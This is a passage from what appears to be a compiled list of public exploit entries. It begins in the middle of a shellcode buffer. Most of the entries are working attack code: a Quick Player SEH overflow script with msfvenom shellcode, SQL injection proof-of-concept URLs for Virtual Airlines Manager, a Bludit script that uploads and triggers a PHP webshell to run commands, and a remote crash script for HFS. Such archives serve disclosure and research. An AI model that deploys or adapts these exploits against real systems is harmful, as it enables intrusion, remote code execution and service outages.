buf += "\x4d\xfb\xe2\xa4\x63\xe8\x9e\xe6\xe9\xef\x2d\x9d\x5f"
buf += "\xef\x2d\x9e\xcf\x98\x1c\x15\x80\xdf\xa0\xfc\xe5\x10"
buf += "\xeb\x5d\x4f\xb9\xb2\x37\xd2\xa4\x44\xe2\x10\xd1\xc6"
buf += "\x07\xe8\x26\xd6\x6d\xed\x63\x50\x9d\x9f\xfc\x35\xa1"
buf += "\x0c\xfc\x1f\xc2\xd3\x6e\xc3\x05"

payload = junk + nseh + seh + nops + buf

f.write(payload)
f.close()
21. # Exploit Title: Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection
# Date: 2020-06-07
# Exploit Author: Pankaj Kumar Thakur
# Vendor Homepage: http://virtualairlinesmanager.net/
# Dork: inurl:notam_id=
# Affected Version: 2.6.2
# Tested on: Ubuntu
# CVE : N/A

Vulnerable parameter
-------------------
notam_id=%27%27

Id parameter's value is going into sql query directly!

Proof of concept
---------------
https://localhost:8080/vam/index.php?page=notam&notam_id=11%27%27

Submitted: Jun 1 2020
Fixed: Jun 5 2020
Acknowledgement : https://ibb.co/Y3WYdFN
22. # Exploit Title: Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)
# Date: 2020-06-05
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Quick-Player/3640-2168_4-10871418.html
# Version: 1.3
# Tested on: Windows 7

# Proof of Concept:
# 1.- Run the python script "poc.py", it will create a new file "poc.m3l"
# 2.- Open the application,
# 3.- Click on the bottom-right button with the letters "PL"
# 4.- Select the option "File"
# 5.- Click "Load List"
# 6.- Select poc.m3l
# 7.- Profit

# Blog where the vulnerability is discussed: https://whitecr0wz.github.io/posts/Exploiting-Quick-Player/
# Direct proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings6/18.gif

# msfvenom -p windows/messagebox TEXT=pwned! -e x86/unicode_mixed -f py EXITFUNC=thread BufferRegister=EAX
# Payload size: 640 bytes

buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x37\x69\x5a\x4b\x73\x6b"
buf += b"\x59\x49\x71\x64\x6f\x34\x69\x64\x70\x31\x4a\x32\x47"
buf += b"\x42\x61\x67\x6e\x51\x35\x79\x43\x34\x64\x4b\x62\x51"
buf += b"\x4c\x70\x64\x4b\x70\x76\x5a\x6c\x64\x4b\x74\x36\x4d"
buf += b"\x4c\x44\x4b\x51\x36\x4b\x58\x64\x4b\x71\x6e\x6d\x50"
buf += b"\x64\x4b\x4d\x66\x4e\x58\x70\x4f\x6b\x68\x31\x65\x4a"
buf += b"\x53\x62\x39\x49\x71\x78\x51\x79\x6f\x58\x61\x53\x30"
buf += b"\x42\x6b\x52\x4c\x6b\x74\x4f\x34\x52\x6b\x50\x45\x6d"
buf += b"\x6c\x72\x6b\x6e\x74\x4c\x68\x33\x48\x69\x71\x4a\x4a"
buf += b"\x52\x6b\x70\x4a\x6a\x78\x32\x6b\x31\x4a\x4d\x50\x6a"
buf += b"\x61\x6a\x4b\x79\x53\x6e\x54\x4e\x69\x44\x4b\x6f\x44"
buf += b"\x54\x4b\x6d\x31\x5a\x4e\x6d\x61\x39\x6f\x4e\x51\x69"
buf += b"\x30\x49\x6c\x46\x4c\x45\x34\x45\x70\x52\x54\x7a\x67"
buf += b"\x35\x71\x66\x6f\x5a\x6d\x49\x71\x77\x57\x58\x6b\x59"
buf += b"\x64\x4d\x6b\x73\x4c\x4d\x54\x6d\x58\x32\x55\x59\x51"
buf += b"\x34\x4b\x4f\x6a\x4b\x74\x4d\x31\x6a\x4b\x71\x56\x62"
buf += b"\x6b\x7a\x6c\x70\x4b\x34\x4b\x6e\x7a\x6d\x4c\x6b\x51"
buf += b"\x48\x6b\x62\x6b\x5a\x64\x44\x4b\x59\x71\x5a\x48\x52"
buf += b"\x69\x71\x34\x6d\x54\x4b\x6c\x71\x51\x46\x63\x37\x42"
buf += b"\x4c\x48\x6c\x69\x38\x54\x62\x69\x58\x65\x52\x69\x79"
buf += b"\x32\x72\x48\x44\x4e\x6e\x6e\x4c\x4e\x78\x6c\x32\x32"
buf += b"\x5a\x48\x45\x4f\x49\x6f\x49\x6f\x4b\x4f\x53\x59\x71"
buf += b"\x35\x69\x74\x77\x4b\x7a\x4f\x68\x4e\x49\x50\x51\x50"
buf += b"\x64\x47\x4b\x6c\x6c\x64\x31\x42\x49\x58\x52\x6e\x59"
buf += b"\x6f\x39\x6f\x49\x6f\x62\x69\x71\x35\x7a\x68\x33\x38"
buf += b"\x30\x6c\x52\x4c\x6b\x70\x4e\x61\x71\x58\x4d\x63\x50"
buf += b"\x32\x4e\x4e\x4f\x74\x52\x48\x71\x65\x34\x33\x32\x45"
buf += b"\x31\x62\x4e\x50\x77\x6b\x62\x68\x71\x4c\x4e\x44\x4a"
buf += b"\x6a\x52\x69\x6b\x36\x6e\x76\x79\x6f\x4f\x65\x6a\x64"
buf += b"\x55\x39\x35\x72\x72\x30\x65\x6b\x56\x48\x77\x32\x6e"
buf += b"\x6d\x75\x6c\x74\x47\x6d\x4c\x4f\x34\x62\x32\x5a\x48"
buf += b"\x51\x4f\x4b\x4f\x49\x6f\x39\x6f\x73\x38\x70\x6f\x71"
buf += b"\x68\x31\x48\x4b\x70\x53\x38\x50\x61\x4f\x77\x43\x35"
buf += b"\x71\x32\x51\x58\x30\x4d\x30\x65\x72\x53\x53\x43\x6e"
buf += b"\x51\x57\x6b\x63\x58\x6f\x6c\x6b\x74\x6a\x6a\x45\x39"
buf += b"\x39\x53\x62\x48\x71\x54\x4d\x51\x6e\x78\x6d\x50\x61"
buf += b"\x58\x70\x70\x31\x67\x32\x4e\x51\x55\x4d\x61\x69\x39"
buf += b"\x72\x68\x6e\x6c\x6d\x54\x4b\x56\x33\x59\x48\x61\x4e"
buf += b"\x51\x49\x42\x4f\x62\x30\x53\x4e\x71\x51\x42\x79\x6f"
buf += b"\x38\x50\x6e\x51\x75\x70\x32\x30\x69\x6f\x32\x35\x4c"
buf += b"\x48\x41\x41"

alignment = "\x54\x71"       # push esp, padding
alignment += "\x58\x71"      # pop eax, padding
alignment += "\x05\x20\x22"  # add eax, 0x22002000
alignment += "\x71"          # Padding
alignment += "\x2D\x19\x22"  # sub eax, 0x22001900
alignment += "\x71"          # Padding
alignment += "\x50\x71"      # push eax, padding
alignment += "\xC3"          # retn

ret = "\x71\x41" + "\xF2\x41" # 0x004100f2 : pop esi # pop ebx # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READWRITE} [Quick Player.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.3.0.0 (C:\Program Files\Quick Player\Quick Player.exe)

buffer = "A" * 536 + ret + "\x41\x71\x41\x71" + alignment + "A" * 73 + buf + "A" * 200

f = open ("poc.m3l", "w")
f.write(buffer)
f.close()
23. # Exploit Title: Bludit 3.9.12 - Directory Traversal
# Date: 2020-06-05
# Exploit Author: Luis Vacacas
# Vendor Homepage: https://www.bludit.com
# Software Link: https://github.com/bludit/bludit
# Version: >= 3.9.12
# Tested on: Ubuntu 19.10
# CVE : CVE-2019-16113

#!/usr/bin/env python3
#-*- coding: utf-8 -*-
import requests
import re
import argparse
import random
import string
import base64
from requests.exceptions import Timeout

class Color:
    PURPLE = '\033[95m'
    CYAN = '\033[96m'
    DARKCYAN = '\033[36m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    RED = '\033[91m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    END = '\033[0m'

banner = base64.b64decode("4pWU4pWXIOKUrCAg4pSsIOKUrOKUjOKUrOKUkOKUrOKUjOKUrOKUkCAg4pWU4pWQ4pWX4pWmIOKVpuKVlOKVl+KVlArilaDilanilZfilIIgIOKUgiDilIIg4pSC4pSC4pSCIOKUgiAgIOKVoOKVkOKVneKVkeKVkeKVkeKVkeKVkeKVkQrilZrilZDilZ3ilLTilIDilJjilJTilIDilJjilIDilLTilJjilLQg4pS0ICAg4pWpICDilZrilanilZ3ilZ3ilZrilZ0KCiBDVkUtMjAxOS0xNjExMyBDeWJlclZhY2EKCg==").decode()
print(Color.RED + Color.BOLD + "\n\n" + banner + Color.END)

def get_args():
    parser = argparse.ArgumentParser(description='Bludit RCE Exploit v3.9.2 CVE-2019-16113 \nBy @CyberVaca')
    parser.add_argument('-u', dest='url', type=str, required=True, help='Url Bludit')
    parser.add_argument('-user', dest='user', type=str,required=True, help='Username')
    parser.add_argument('-pass', dest='password', type=str, required=True, help='Password' )
    parser.add_argument('-c', dest='command', type=str, required=True, help='Command to execute' )
    return parser.parse_args()

def randomString(stringLength=8):
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(stringLength))

def informa(msg):
    print (Color.GREEN + "[" + Color.RED + "+" + Color.GREEN + "] " + msg)

def login(url,username,password):
    session = requests.Session()
    login_page = session.get(url + "/admin/")
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
    informa("csrf_token: " + Color.END + csrf_token)
    la_cookie = ((login_page.headers['Set-Cookie']).split(";")[0].split("=")[1])
    paramsPost = {"save":"","password":password,"tokenCSRF":csrf_token,"username":username}
    headers = {"Origin":url,"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer": url + "/admin/","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"}
    cookies = {"BLUDIT-KEY":la_cookie}
    response = session.post(url + "/admin/", data=paramsPost, headers=headers, cookies=cookies, allow_redirects = False)
    informa("cookie: " + Color.END + la_cookie)
    return(la_cookie)

def csrf_logado(url,la_cookie):
    session = requests.Session()
    headers = {"Origin":url,"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":url + "/admin/","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"}
    cookies = {"BLUDIT-KEY":la_cookie}
    response = session.get(url + "/admin/dashboard", headers=headers, cookies=cookies)
    token_logado = response.text.split('var tokenCSRF = "')[1].split('"')[0]
    informa("csrf_token: " + Color.END + token_logado)
    return token_logado

def subida_shell(url,la_cookie,token_logado,command,webshell):
    session = requests.Session()
    paramsPost = {"uuid":"../../tmp","tokenCSRF":token_logado}
    paramsMultipart = [('images[]', (webshell, "<?php shell_exec(\"rm .htaccess ; rm " + webshell + " ;" + command + "\");?>", 'application/octet-stream'))]
    headers = {"Origin":url,"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":url + "/admin/new-content","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"}
    cookies = {"BLUDIT-KEY":la_cookie}
    response = session.post(url + "/admin/ajax/upload-images", data=paramsPost, files=paramsMultipart, headers=headers, cookies=cookies)
    informa("Uploading " + Color.END + webshell + Color.END)

def subida_htaccess(url,la_cookie,token_logado):
    session = requests.Session()
    paramsPost = {"uuid":"../../tmp","tokenCSRF":token_logado}
    paramsMultipart = [('images[]', ('.htaccess', "RewriteEngine off\r\nAddType application/x-httpd-php .jpg", 'application/octet-stream'))]
    headers = {"Origin":url,"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":url + "/admin/new-content","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"}
    cookies = {"BLUDIT-KEY":la_cookie}
    response = session.post(url + "/admin/ajax/upload-images", data=paramsPost, files=paramsMultipart, headers=headers, cookies=cookies)

def trigger_command(url,webshell,command):
    session = requests.Session()
    headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"}
    try:
        response = session.get(url + "/bl-content/tmp/" + webshell, headers=headers, timeout=1)
    except requests.exceptions.ReadTimeout:
        pass
    informa("Executing command: " + Color.END + command )
    informa("Delete: " + Color.END + ".htaccess")
    informa("Delete: " + Color.END + webshell)

if __name__ == '__main__':
    args = get_args()
    webshell = randomString(8) + ".jpg"
    la_cookie = login(args.url,args.user,args.password)
    token_logado = csrf_logado(args.url,la_cookie)
    subida_shell(args.url,la_cookie,token_logado,args.command,webshell)
    subida_htaccess(args.url,la_cookie,token_logado)
    trigger_command(args.url,webshell,args.command)
  24. # Exploit Title: Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection
# Google Dork: N/A
# Date: 2020-06-08
# Exploit Author: Kostadin Tonev
# Vendor Homepage: http://virtualairlinesmanager.net
# Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/
# Version: 2.6.2
# Tested on: Linux Mint
# CVE : N/A

[1] Vulnerable GET parameter: notam_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi]

[2] Vulnerable GET parameter: airport=[SQLi]
[PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi]

[3] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]

[4] Vulnerable GET parameter: plane_location=[SQLi]
[PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi]

[5] Vulnerable GET parameter: hub_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi]

[6] Vulnerable GET parameter: pilot_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi]

[7] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]

[8] Vulnerable GET parameter: event_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi]

[9] Vulnerable GET parameter: tour_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]
  25. # Exploit Title: HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)
# Date: 2020-06-05
# Exploit Author: hyp3rlinx
# Vendor Homepage: www.rejetto.com
# CVE : CVE-2020-13432

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/HFS-HTTP-FILE-SERVER-v2.3-REMOTE-BUFFER-OVERFLOW-DoS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.rejetto.com

[Product]
HFS Http File Server v2.3m Build 300

[Vulnerability Type]
Remote Buffer Overflow (DoS)

[CVE Reference]
CVE-2020-13432

[Security Issue]
rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual files or folders are used, allows remote attackers to trigger an invalid-pointer write access violation via concurrent HTTP requests with a long URI or long HTTP headers like Cookie, User-Agent etc.

Remote unauthenticated attackers can send concurrent HTTP requests using an incrementing or specific payload range of junk characters for values in the URL parameters or HTTP headers sent to the server. This results in hfs.exe server crash from an invalid pointer write access violation.

Requirements: hfs.exe must have at least one saved virtual file or folder present.
Test using a remote IP and NOT from the same machine (localhost).

Dump...

(e4c.3a8): Access violation - code c0000005 (first/second chance not available)
For analysis of this file, run !analyze -v
WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds.
eax=000a1390 ebx=000a138c ecx=006eb188 edx=001b0000 esi=00000000 edi=00000002
eip=777ef8b4 esp=000a0e0c ebp=000a12cc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
ntdll!RtlpResolveAssemblyStorageMapEntry+0x18:
777ef8b4 53              push    ebx

0:000> !load winext/msec
0:000> !exploitable
WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds.
*** WARNING: Unable to verify checksum for hfs.exe
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlpResolveAssemblyStorageMapEntry+0x0000000000000018 (Hash=0x7a29717c.0x325e6a71)

PROCESS_NAME:  hfs.exe
FOLLOWUP_IP:
hfs+8fad7
0048fad7 8945f0          mov     dword ptr [ebp-10h],eax
WRITE_ADDRESS:  000a0e08

[References]
https://github.com/rejetto/hfs2/releases/tag/v2.4-rc01

[Exploit/POC]
from socket import *
import time,sys

#HFS HTTP File Server v2.3m build 300.
#Vendor: www.rejetto.com
#Remote Remote Buffer Overflow DoS
#Note: hfs.exe must have at least one saved virtual file or folder on the target
#test using a remote IP and not from the same machine.
#Discovery: hyp3rlinx
#hyp3rlinx.altervista.org
#ISR: ApparitionSec
#=========================================================================

res=""
once=0
cnt=0
max_requests=1666


def hfs_dos():
    global ip,port,length,res,once,cnt,max_requests
    cnt+=1
    length += 1
    payload = "A"*length
    try:
        s=socket(AF_INET, SOCK_STREAM)
        s.settimeout(2)
        s.connect((ip,port))
        ##bof ="HEAD / HTTP/1.1\r\nHost: "+ip+"Cookie: "+payload+"\r\n\r\n"
        bof ="HEAD /?mode="+payload+" HTTP/1.1\r\nHost: "+ip+"\r\n\r\n"
        s.send(bof.encode("utf-8"))
        if once==0:
            once+=1
            res = s.recv(128)
            if res != "":
                print("Targets up please wait...")
            if "HFS 2.3m" not in str(res):
                print("[!] Non vulnerable HFS version, exiting :(")
                exit()
    except Exception as e:
        if e != None:
            if str(e).find("timed out")!=-1:
                if res=="":
                    print("[!] Target is not up or behind a firewall? :(")
                    exit()
                else:
                    print("[!] Done!")
                    exit()
    s.close()
    if cnt == max_requests:
        return False
    return True


def msg():
    print("HFS HTTP File Server v2.3m build 300.")
    print("Unauthenticated Remote Buffer Overflow (DoS - PoC)")
    print("Virtual HFS saved file or folder required.")
    print("Run from a different machine (IP) than the target.")
    print("By Hyp3rlinx - ApparitionSec\n")


if __name__=="__main__":
    length=3
    if len(sys.argv) != 3:
        msg()
        print("Usage: <hfs.exe Server>, <Port (usually 8080)>")
        exit()
    ip = sys.argv[1]
    port = int(sys.argv[2])
    msg()
    while True:
        if not hfs_dos():
            print("[!] Failed, non vuln version or no virtual files exist :(")
            break

[POC Video URL]
https://www.youtube.com/watch?v=qQ-EawfXuWY

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: May 18, 2020
Vendor reply: May 18, 2020
Vendor confirm vulnerability: May 19, 2020
Vendor creates fix: May 20, 2020
Vendor released new version 2.4 : June 7, 2020
June 8, 2020 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx